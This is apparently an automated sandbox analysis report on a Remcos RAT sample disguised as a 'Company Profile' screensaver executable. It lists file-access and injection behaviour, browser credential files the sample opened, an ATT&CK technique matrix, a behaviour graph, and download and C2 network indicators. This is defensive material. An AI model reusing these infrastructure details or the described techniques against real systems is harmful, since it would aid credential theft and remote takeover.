            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F52264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_22F52264
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,11_2_004082CD
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1292, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword11_2_004033F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword11_2_00402DB3
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword11_2_00402DB3
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1292, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 528, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-NJ8CFRJump to behavior
            Source: Yara matchFile source: 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1292, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts11
            Native API
            1
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            2
            Obfuscated Files or Information
            1
            Credentials in Registry
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts12
            Command and Scripting Interpreter
            Logon Script (Windows)412
            Process Injection
            1
            Software Packing
            Security Account Manager3
            File and Directory Discovery
            SMB/Windows Admin Shares2
            Clipboard Data
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell
            Login Hook1
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            NTDS27
            System Information Discovery
            Distributed Component Object ModelInput Capture1
            Remote Access Software
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets41
            Security Software Discovery
            SSHKeylogging2
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Modify Registry
            Cached Domain Credentials31
            Virtualization/Sandbox Evasion
            VNCGUI Input Capture113
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
            Virtualization/Sandbox Evasion
            DCSync4
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568022 Sample: Company Profile and new ord... Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 43 s25.filetransfer.io 2->43 45 geoplugin.net 2->45 47 filetransfer.io 2->47 55 Suricata IDS alerts for network traffic 2->55 57 Found malware configuration 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 9 other signatures 2->61 10 Company Profile and new order-202401127.scr.exe 34 2->10         started        signatures3 process4 file5 37 C:\Users\user\AppData\...\bordskaaneren.Exp, Unicode 10->37 dropped 71 Suspicious powershell command line found 10->71 14 powershell.exe 30 10->14         started        signatures6 process7 file8 39 Company Profile an...r-202401127.scr.exe, PE32 14->39 dropped 41 Company Profile an...exe:Zone.Identifier, ASCII 14->41 dropped 73 Early bird code injection technique detected 14->73 75 Writes to foreign memory regions 14->75 77 Found suspicious powershell code related to unpacking or dynamic code loading 14->77 79 3 other signatures 14->79 18 msiexec.exe 5 14 14->18         started        22 conhost.exe 14->22         started        signatures9 process10 dnsIp11 49 185.29.10.213, 49825, 49840, 63650 DATACLUB-SE European Union 18->49 51 filetransfer.io 104.21.13.139, 443, 49807, 49813 CLOUDFLARENETUS United States 18->51 53 geoplugin.net 178.237.33.50, 49835, 80 ATOM86-ASATOM86NL Netherlands 18->53 63 Detected Remcos RAT 18->63 65 Tries to steal Mail credentials (via file registry) 18->65 67 Maps a DLL or memory area into another process 18->67 24 msiexec.exe 14 18->24         started        27 msiexec.exe 1 18->27         started        29 cmd.exe 1 18->29         started        31 msiexec.exe 1 18->31         started        signatures12 process13 signatures14 69 Tries to harvest and steal browser information (history, passwords, etc) 24->69 33 conhost.exe 29->33         started        35 reg.exe 1 1 29->35         started        process15

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Company Profile and new order-202401127.scr.exe8%ReversingLabs
            Company Profile and new order-202401127.scr.exe14%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Company Profile and new order-202401127.scr.exe8%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            s25.filetransfer.io0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzntorage/download/Yo8ryWgWZnzn0%Avira URL Cloudsafe
            https://s25.filetransfer.io/0%Avira URL Cloudsafe
            https://login.live.c5z0%Avira URL Cloudsafe
            https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzn20240%Avira URL Cloudsafe
            https://s25.filetransfer.io/50%Avira URL Cloudsafe
            https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzn0%Avira URL Cloudsafe
            https://s25.filetransfer.io/0%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            geoplugin.net
            178.237.33.50
            truefalse
              high
              s25.filetransfer.io
              104.21.13.139
              truefalseunknown
              filetransfer.io
              104.21.13.139
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpfalse
                  high
                  https://s25.filetransfer.io/storage/download/Yo8ryWgWZnznfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://filetransfer.io/data-package/a8AChfye/downloadfalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzntorage/download/Yo8ryWgWZnznmsiexec.exe, 00000006.00000003.2722098799.0000000006BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.imvu.comrmsiexec.exe, 00000006.00000002.3321265008.0000000022F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                          high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://aka.ms/pscore6lBeqpowershell.exe, 00000002.00000002.2608136076.0000000005261000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://geoplugin.net/json.gpxe?msiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://www.imvu.commsiexec.exe, msiexec.exe, 0000000C.00000003.2864612972.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864688623.000000000366E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864652580.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2865411974.000000000366E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://filetransfer.io/data-package/a8AChfye/download9msiexec.exe, 00000006.00000003.2759594214.0000000006BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.nirsoft.netmsiexec.exe, 0000000A.00000002.2878388474.0000000002FF4000.00000004.00000010.00020000.00000000.sdmpfalse
                                              high
                                              http://nsis.sf.net/NSIS_ErrorErrorCompany Profile and new order-202401127.scr.exe, Company Profile and new order-202401127.scr.exe.2.drfalse
                                                high
                                                http://geoplugin.net/json.gp;msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://s25.filetransfer.io/msiexec.exe, 00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 00000006.00000002.3321265008.0000000022F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      high
                                                      https://s25.filetransfer.io/5msiexec.exe, 00000006.00000003.2722098799.0000000006BB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://geoplugin.net/json.gpDmsiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.google.commsiexec.exe, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          high
                                                          https://filetransfer.io/msiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://geoplugin.net/msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
